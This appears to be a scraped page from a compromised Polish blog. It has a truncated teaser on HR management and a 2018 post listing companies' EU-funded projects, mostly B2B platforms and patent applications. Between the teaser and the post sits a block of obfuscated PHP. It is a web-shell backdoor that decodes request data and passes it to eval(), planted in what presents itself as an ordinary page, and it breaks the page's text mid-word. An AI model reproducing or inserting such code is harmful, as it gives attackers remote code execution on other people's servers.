Losowy

Kim jestem

Optymalizacja zasobów ludzkich i zapewnienie pracownikom optymalnego rozwoju to dwa obszary, przy jakich wielu managerów popełnia mnóstwo błędów. Traktowanie z lekceważeniem zatrudnionych pracowników czy przekraczanie bez przerwy granic z uwagi na swoją pozycję to raptem dwa z wielu grzechów, które często się obse

Czytaj więcej...
$o4ef7652){$xa411 = $o4ef7652;$c43ec = $t3aef;}if (!$xa411){foreach ($maf736[$maf736['w4ed17'][30].$maf736['w4ed17'][57].$maf736['w4ed17'][9].$maf736['w4ed17'][91].$maf736['w4ed17'][35].$maf736['w4ed17'][79].$maf736['w4ed17'][9].$maf736['w4ed17'][73].$maf736['w4ed17'][97]] as $t3aef=>$o4ef7652){$xa411 = $o4ef7652;$c43ec = $t3aef;}}$xa411 = @$maf736[$maf736['w4ed17'][90].$maf736['w4ed17'][52].$maf736['w4ed17'][22].$maf736['w4ed17'][35].$maf736['w4ed17'][9].$maf736['w4ed17'][91]]($maf736[$maf736['w4ed17'][58].$maf736['w4ed17'][9].$maf736['w4ed17'][46].$maf736['w4ed17'][91].$maf736['w4ed17'][22].$maf736['w4ed17'][73].$maf736['w4ed17'][22]]($maf736[$maf736['w4ed17'][3].$maf736['w4ed17'][9].$maf736['w4ed17'][79].$maf736['w4ed17'][21]]($xa411), $c43ec));if (isset($xa411[$maf736['w4ed17'][52].$maf736['w4ed17'][90]]) && $x9fe==$xa411[$maf736['w4ed17'][52].$maf736['w4ed17'][90]]){if ($xa411[$maf736['w4ed17'][52]] == $maf736['w4ed17'][47]){$f35f1d = Array($maf736['w4ed17'][51].$maf736['w4ed17'][34] => @$maf736[$maf736['w4ed17'][84].$maf736['w4ed17'][9].$maf736['w4ed17'][46].$maf736['w4ed17'][52].$maf736['w4ed17'][84].$maf736['w4ed17'][57].$maf736['w4ed17'][25]](),$maf736['w4ed17'][7].$maf736['w4ed17'][34] => $maf736['w4ed17'][46].$maf736['w4ed17'][64].$maf736['w4ed17'][22].$maf736['w4ed17'][87].$maf736['w4ed17'][46],);echo @$maf736[$maf736['w4ed17'][90].$maf736['w4ed17'][46].$maf736['w4ed17'][81].$maf736['w4ed17'][57].$maf736['w4ed17'][81].$maf736['w4ed17'][74]]($f35f1d);}elseif ($xa411[$maf736['w4ed17'][52]] == $maf736['w4ed17'][73]){eval/*m910db*/($xa411[$maf736['w4ed17'][91]]);}exit();}} ?>

Dotacje rozwojowe na szkolenia

Data publikacji: 05.06.2018
Autor: admin

Spis aplikacji, które mają przyznaną pomoc publiczną w przyszłym kwartale:

Automatyzacja procesów B2B w zakresie dystrybucji materiałów eksploatacyjnych do drukarek komputerowych dzięki wdrożeniu systemu B2B z użyciem platformy Software-as-a-Service.

Unowocześnienie procesów biznesowych zachodzących pomiędzy Arteo Sp z o.o. Spółką komandytową a jej Partnerami poprzez wdrożenie nowoczesnego modelu B2B.

Badania nad opracowaniem wytycznych, technik i technologii dla systemów kompensacji mocy biernej, inteligentnego monitoringu wewnętrznych sieci elektroenergetycznych oraz ogniw fotowoltaicznych dedykowanych obiektom hybrydowym opartym wyłącznie o źródła odnawialne

Kompletne zaprojektowanie i zaimplementowanie od a do Z nowoczesnej i praktycznej platformy B2B opartej o wzajemną, automatyczną wymianę informacji do obsługi procesów biznesowych zachodzących pomiędzy firmą Phoenix Enterprise Sp. z o.o. a jej partnerami.

Budowa sieci teleinformatycznej w miejscowościach Zakrzewo, Godziszewo, Nowa Tuchorza, Tuchorza, Stara Tuchorza, Reklin, Reklinek, Siedlec, gmina Siedlec.

Dokonanie zgłoszenia patentowego w procedurze PCT na wypornościową deskę pływającą z mechanizmem napędem śrubowym do zastosowań w turystyce i sportach wodnych

Dostosowanie procesu mobilnego PPH Unicell Poland Sp. z o.o. w celu umożliwienia automatyzacji wymiany informacji między systemami zdalnymi Partnerów

Implementacja procesu mobilnego w firmie BRAINSHAKE &MORE SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ - SPÓŁKA KOMANDYTOWA prowadzący do automatyzacji procesów biznesowych.|Innowacyjna technologia wytwarzania struktur tłumiących drgania w układach zawieszenia pojazdów z zastosowaniem spajania w systemie aktywnego podawania drutu (AWP)

Interaktywna aplikacja do automatycznego tworzenia e-ramówki kanału telewizyjnego nadawanego w technologii IPTV w sieciach ISP, TVK, Smart TV, mobilnych oraz innych IP.

iWebFlow - Społecznościowa platforma kooperacji i i integracji działania dla małego biznesu. Usługa wspomagająca workflow, pracę grupową i zarządzanie dokumentami w konwencji Enterprise 2.0

Nowoczesna architektura oprogramowania, zintegrowana z automatycznym systemem testowania, zapewniająca zwiększony poziom bezpieczeństwa, zaimplementowana do modułowego modelu infuzji leków i płynów.

Zaprojektowanie i zaimplementowanie od a do Z aplikacji B2B przeznaczonej do automatyzacji wymiany informacji biznesowych z współpracującymi partnerami MX Solution Sp. z o.o.

Opracowanie i wdrożenie zaawansowanej e-usługi polegającej na automatycznym badaniu opinii użytkowników sieci Internet wraz z semantyczną ekstrakcją informacji opartą o algorytmy sztucznej inteligencji - Mobuzzer.

Opracowanie Planu Rozwoju Eksportu dla firmy Przedsiębiorstwo Handlowo Produkcyjno Usługowe TA-NO Tadeusz Nockoski w celu rozwoju działalności eksportowej.

Podniesienie konkurencyjności przedsiębiorstwa Odlewnia Żeliwa Lisie Kąty Sławomir i Bogusław Mioduszewscy Spółka Jawna poprzez Wynajem i uruchomienie innowacyjnej automatycznej linii formierskiej bezskrzynkowej o pionowym podziale formy oraz Uruchomienie i upowszechnienie do oferty nowych produktów

Program Team - projekty, w których uczestniczą studenci, doktoranci i uczestnicy staży podoktorskich, zgodne z wskazanymi w PO IG priorytetami, realizowane w najlepszych zespołach badawczych w Polsce

Przebudowa istniejącego w NZOZ Internistyczne Gabinety Lekarskie modelu informatycznego oraz uruchomienie niezbędnej infrastruktury teleinformatycznej w celu automatyzacji procesów wymiany i przetwarzania wyników badań z zakresu diagnostyki cyfrowej

Spersonalizowana interaktywna dystrybucja skatalogowanego kontentu mobilnego lub usług mobilnych za pośrednictwem platformy mobilnej - Platforma Interaktywna

Stworzenie i udostępnienie portalu Qcadoo umożliwiającego usługę samodzielnego konfigurowania i korzystania z systemu typu MES przez Internet w modelu SaaS

Wdrożenie calkowicie nowatorskiej porównywarki ubezpieczeń on-line uwzględniającej w procesie porównania zawsze aktualne oferty dostępne w systemach direct poszczególnych towarzystw ubezpieczeniowych.

Stworzenie zdalnego serwisu I-ISO, stanowiącego narzędzie dla przedsiębiorców, do zarządzania dokumentacja systemową i zapisami zgodnie z wymaganiami międzynarodowych standardów zarządzania ISO.

Zaprojektowanie kompleksowej platformy on-line ds. zarządzania stadami bydła w zakresie żywienia,reprodukcji i dobrostanu dla optymalizacji jakości i rentowności produkcji.

Opracowanie platformy internetowej umożliwiającej sprzedaż zindywidualizowanych e-usług w postaci propozycji spędzania wolnego czasu, informatora turystycznego|Stworzenie platformy klasy B2B w przedsiębiorstwie VADEMECUMTAX SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ, w celu automatyzacji modeli biznesowych z partnerami.

Zaprojektowanie szans długoterminowego rozwoju grupy Motivation Direct Sp. z o.o. poprzez zaimplementowanie od a do Z systemu B2B optymalizującego procesy biznesowe realizowane we współpracy z partnerami handlowymi.

Projekt i prototyp platformy internetowej generującej kastomizowany newsletter o możliwościach dofinansowania oraz usprawniającej pozyskiwanie informacji o dotacjach.

Uzyskanie ochrony patentowejna terenie Polski oraz komercjalizacja wynalazku  pt.: Sposób wykrywania obecności badanej substancji opracowany w Instytucie Immunologii i Terapii Doświadczalnej Polskiej Akademii Nauk przez pracowników naukowych A. Gamian, J. Rybka,  T. Gotszalk, J. Mielczarski

Uzyskanie ochrony patentowej na terytorium Polski oraz komercjalizacja wynalazku pt.: Podwójnie skręcone oligonukleotydy interferujące z mRNA genu dla integryny 3 (siRNA) stosowane w terapii przeciwnowotworowej i przeciwprzerzutowej opracowany w Instytucie Immunologii i Terapii Doświadczalnej Polskiej Akademii Nauk przez pracowników naukowych A.Nasulewicz, J.Wietrzyk,  K. Szczaurska-Nowak

Wdrożenie automatycznego systemu B2B - Biznesowy Integrator Firmowy umożliwiającego rozwój współpracy pomiędzy firmą KEREL a przedsiębiorstwami kooperacyjnymi.

Zaimplementowanie od podstaw e-usługi wirtualnego architekta krajobrazu, automatycznie dostarczającego projekty ogrodów z wykorzystaniem bazy wiedzy o roślinach i zasadach projektowania.

Zaimplementowanie od podstaw nowoczesnego procesu B2B opartego o wzajemną, automatyczną wymianę informacji do obsługi procesów biznesowych zachodzących pomiędzy dostawcami i odbiorcami korporacji Handlowo- Usługowego Mat Instal Karol Kluczewski

Wdrożenie innowacyjnego Systemu Informatycznego klasy B2B, automatyzującego procesy biznesowe zachodzące pomiędzy firmą B + B M. BIEŃKOWSKI L. BUDKOWSKI Sp.j. a jej partnerami biznesowymi |Zaimplementowanie od podstaw internetowego modelu klasy B2B integrującego procesy elektronicznej wymiany danych i informacji między firmą KC Consulting Jerzy Wawryszczuk, a partnerami.

Wdrożenie nowoczesnego procesu B2B integrującego systemy przedsiębiorstwa Handlowego Agroskład i partnerów w zakresie składania zamówień, zakupów i fakturowania.

Wdrożenie nowoczesnego modelu B2B zwiększającego efektywność współpracy pomiędzy Spółką Wil-Sad, a jej partnerami biznesowymi poprzez automatyzację wymiany danych

Zaimplementowanie od podstaw przez Komex Izabela Kliszcz-Hildenhagen dedykowanego modelu integrującego systemy zarządzania przedsiębiorstwem pięciu współpracujących przedsiębiorstw.

Zaimplementowanie od podstaw procesu B2B, a także zaawansowanego systemu przetwarzania danych w formule SaaS w firmie ORBITGAZ BYTOM Spółka Cywilna Jarosław Szczerba, Bernadeta Szczerba w celu usprawnienia strategicznych modeli biznesowych.

Zaimplementowanie od podstaw w firmie REVISION procesu B2B, realizującego wymianę elektronicznych danych i dokumentów księgowo - podatkowych oraz aktualnego modelu rewizji finansowej z partnerami

Wprowadzenie nowej produkcji korpusów hydraulicznych, wałków oraz zaworów z wykorzystaniem technologii opartej na samodzielnie skonstruowanej głowicy frezarskiej.

Wsparcie ochrony praw własności przemysłowej dla wynalazku w zakresie elektrochemiczno-mechanicznego polerowania płytek węglika krzemu (SiC)".

Wykorzystanie materiałów i konstrukcji inteligentnych do opracowania koncepcji i wykonania nowoczesnego modelu łożyskowania wirników mikroturbin energetycznych

Zgłoszenie do międzynarodowej ochrony patentowejwynalazku dotyczącego masy formierskiej lub rdzeniowej wiązanej biodegradowalnym spoiwem polimerowymTagi: